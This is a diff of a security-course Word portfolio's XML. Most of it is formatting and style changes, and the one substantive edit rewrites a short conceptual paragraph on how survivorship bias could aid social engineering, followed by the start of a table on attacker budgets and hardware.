@@ -1852,18 +1549,87 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:styleId="Normal" w:default="1">
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rPr>
+      <w:lang w:val="en-AU"/>
+    </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
+  <w:style w:type="paragraph" w:styleId="Heading1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="181B8E52"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="360" w:after="80"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="40"/>
+      <w:szCs w:val="40"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="181B8E52"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="160" w:after="80"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="181B8E52"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="80" w:after="40"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="table" w:styleId="TableNormal" w:default="1">
+  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -1878,107 +1644,44 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
-  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
+  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
     <w:name w:val="No List"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Title">
-    <w:uiPriority w:val="10"/>
     <w:name w:val="Title"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
+    <w:uiPriority w:val="10"/>
     <w:qFormat/>
     <w:rsid w:val="29C051EC"/>
-    <w:rPr>
-      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="" w:cs="" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:sz w:val="56"/>
-      <w:szCs w:val="56"/>
-    </w:rPr>
     <w:pPr>
       <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
       <w:contextualSpacing/>
     </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading1">
-    <w:uiPriority w:val="9"/>
-    <w:name w:val="heading 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:qFormat/>
-    <w:rsid w:val="181B8E52"/>
     <w:rPr>
-      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="" w:cs="" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
-      <w:sz w:val="40"/>
-      <w:szCs w:val="40"/>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:sz w:val="56"/>
+      <w:szCs w:val="56"/>
     </w:rPr>
-    <w:pPr>
-      <w:keepNext w:val="1"/>
-      <w:keepLines w:val="1"/>
-      <w:spacing w:before="360" w:after="80"/>
-      <w:outlineLvl w:val="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading2">
-    <w:uiPriority w:val="9"/>
-    <w:name w:val="heading 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="181B8E52"/>
-    <w:rPr>
-      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="" w:cs="" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
-      <w:sz w:val="32"/>
-      <w:szCs w:val="32"/>
-    </w:rPr>
-    <w:pPr>
-      <w:keepNext w:val="1"/>
-      <w:keepLines w:val="1"/>
-      <w:spacing w:before="160" w:after="80"/>
-      <w:outlineLvl w:val="1"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading4">
-    <w:uiPriority w:val="9"/>
-    <w:name w:val="heading 4"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="181B8E52"/>
-    <w:rPr>
-      <w:rFonts w:eastAsia="" w:cs="" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:i w:val="1"/>
-      <w:iCs w:val="1"/>
-      <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
-    </w:rPr>
-    <w:pPr>
-      <w:keepNext w:val="1"/>
-      <w:keepLines w:val="1"/>
-      <w:spacing w:before="80" w:after="40"/>
-      <w:outlineLvl w:val="3"/>
-    </w:pPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="ListParagraph">
-    <w:uiPriority w:val="34"/>
     <w:name w:val="List Paragraph"/>
     <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
     <w:qFormat/>
     <w:rsid w:val="181B8E52"/>
     <w:pPr>
-      <w:spacing/>
       <w:ind w:left="720"/>
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
   <w:style w:type="character" w:styleId="Hyperlink">
-    <w:uiPriority w:val="99"/>
     <w:name w:val="Hyperlink"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="181B8E52"/>
     <w:rPr>
@@ -1986,65 +1689,70 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="table" w:styleId="TableGrid">
-    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Table Grid"/>
-    <w:basedOn xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="TableNormal"/>
-    <w:uiPriority xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="59"/>
-    <w:rsid xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="00FB4123"/>
-    <w:pPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+  <w:style w:type="table" w:styleId="TableGrid">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="59"/>
+    <w:rsid w:val="00FB4123"/>
+    <w:pPr>
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
-    <w:tblPr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-      <w:tblInd w:w="0" w:type="dxa"/>
+    <w:tblPr>
       <w:tblBorders>
-        <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:insideH w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
-        <w:insideV w:val="single" w:color="000000" w:themeColor="text1" w:sz="4" w:space="0"/>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="000000" w:themeColor="text1"/>
       </w:tblBorders>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
     </w:tblPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Header">
-    <w:uiPriority w:val="99"/>
     <w:name w:val="header"/>
     <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="42D4980C"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="center" w:leader="none" w:pos="4680"/>
-        <w:tab w:val="right" w:leader="none" w:pos="9360"/>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
       </w:tabs>
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Footer">
-    <w:uiPriority w:val="99"/>
     <w:name w:val="footer"/>
     <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="42D4980C"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="center" w:leader="none" w:pos="4680"/>
-        <w:tab w:val="right" w:leader="none" w:pos="9360"/>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
       </w:tabs>
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AB26CD"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
 
 <file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
-<a:theme xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
   <a:themeElements>
     <a:clrScheme name="Office">
       <a:dk1>

--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -240,12 +240,14 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Humans, Measuring</w:t>
       </w:r>
@@ -323,63 +325,23 @@
               <w:t>person’s</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> favour than in reality. </w:t>
+              <w:t xml:space="preserve"> favour </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>than in reality</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">. </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>When applied to a</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> security context this can lead to the prediction of people’s behaviours from </w:t>
-            </w:r>
-            <w:r>
-              <w:t>their surrounding senior mentors in appealing positions to the individual (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>e.g</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">supervisors who are working </w:t>
-            </w:r>
-            <w:r>
-              <w:t>high paying roles</w:t>
-            </w:r>
-            <w:r>
-              <w:t>/industries</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">or </w:t>
-            </w:r>
-            <w:r>
-              <w:t>relatives that have progressed in highly selective fields etc</w:t>
-            </w:r>
-            <w:r>
-              <w:t>)</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">. Due to this highly predictive bias, </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">an attacker can begin social engineering scenarios that exploit this as a vulnerability that your behaviour is in the attackers favour. For example, an attacker might infiltrate a highly admired member at a large firm within an engineering field that you have occasionally met, and then proceed to begin to send targeted ads and </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">information about this field to you for your </w:t>
-            </w:r>
-            <w:r>
-              <w:t>desire to grow. Then for them to use this professor to offer a rare opportunity that makes things easy for you .</w:t>
+              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
             </w:r>
           </w:p>
-          <w:p/>
           <w:p/>
           <w:p/>
           <w:p/>
@@ -1627,6 +1589,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -112,7 +112,6 @@
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
@@ -120,17 +119,7 @@
           <w:bCs/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>zID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>zID:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -159,6 +148,15 @@
         </w:rPr>
         <w:t>Date Submitted:</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 17/06/27</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -190,7 +188,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId7">
+      <w:hyperlink r:id="rId8">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -243,6 +241,7 @@
           <w:highlight w:val="yellow"/>
         </w:rPr>
       </w:pPr>
+      <w:commentRangeStart w:id="0"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -251,12 +250,24 @@
         </w:rPr>
         <w:t>Humans, Measuring</w:t>
       </w:r>
+      <w:commentRangeEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:commentReference w:id="0"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId8">
+      <w:hyperlink r:id="rId13">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -304,7 +315,7 @@
             <w:r>
               <w:t xml:space="preserve">Link: </w:t>
             </w:r>
-            <w:hyperlink r:id="rId9" w:history="1">
+            <w:hyperlink r:id="rId14" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -325,15 +336,7 @@
               <w:t>person’s</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> favour </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>than in reality</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">. </w:t>
+              <w:t xml:space="preserve"> favour than in reality. </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -375,7 +378,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId10">
+      <w:hyperlink r:id="rId15">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -429,9 +432,44 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId11">
+      <w:hyperlink r:id="rId16">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -457,15 +495,3202 @@
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:commentRangeStart w:id="1"/>
+          </w:p>
+          <w:tbl>
+            <w:tblPr>
+              <w:tblW w:w="9239" w:type="dxa"/>
+              <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              <w:tblBorders>
+                <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
+                <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
+                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
+                <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
+              </w:tblBorders>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:tblCellMar>
+                <w:top w:w="15" w:type="dxa"/>
+                <w:left w:w="15" w:type="dxa"/>
+                <w:bottom w:w="15" w:type="dxa"/>
+                <w:right w:w="15" w:type="dxa"/>
+              </w:tblCellMar>
+              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+            </w:tblPr>
+            <w:tblGrid>
+              <w:gridCol w:w="1549"/>
+              <w:gridCol w:w="1122"/>
+              <w:gridCol w:w="1933"/>
+              <w:gridCol w:w="2074"/>
+              <w:gridCol w:w="2561"/>
+            </w:tblGrid>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="616"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:b/>
+                      <w:bCs/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Attacker</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:b/>
+                      <w:bCs/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Budget</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:b/>
+                      <w:bCs/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Hardware</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:b/>
+                      <w:bCs/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Bits of work per 24 hours</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
